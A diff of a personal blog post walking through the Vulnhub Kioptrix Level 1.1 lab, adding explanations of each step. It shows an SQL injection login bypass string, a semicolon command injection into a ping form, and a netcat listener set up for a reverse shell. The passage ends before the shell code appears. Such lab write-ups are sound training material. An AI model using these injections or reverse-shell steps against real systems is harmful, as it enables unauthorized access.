jakebacker/jakebacker.github.io/_posts/2019-10-20-Vulnhub-Kioptrix-Level-1-1.md

 ![ZAP Results]({{ site.baseurl }}/images/KioptrixLevel1_1/zap.png "ZAP Results")

 I plugged the attack used (`ZAP' OR '1'='1' --`) into the username field and was presented with a form to ping a machine on the network.
+This works because there is an SQL query on the server that does not sanitize the input.
+The ' in the input terminates the previous string that the query is expecting.
+The next bit tells the query that if 1=1, also allow the user to proceed.
+The -- at the end just comments out the rest of the query.

-I immanently suspected there to be a bash injection vulnerability, but I plugged in an IP to make sure.
+I immediately suspected there to be a bash injection vulnerability, but I plugged in an IP to make sure.

 This brought me to a page containing the output to the ping command.

 ![ping results]({{ site.baseurl }}/images/KioptrixLevel1_1/ping.png "ping Results")

 I ran `; ls` to make sure that I could inject a command and was presented with a directory listing.
+Here, the server is plugging in the contents of the input box into `ping <input>`.
+The semicolon terminates the ping command and runs whatever is after it.

 Next, I injected a reverse shell by first opening a netcat listener on my Kali VM and then putting the shell code into the form.

 ```
 root@kali:~# nc -nvlp 1234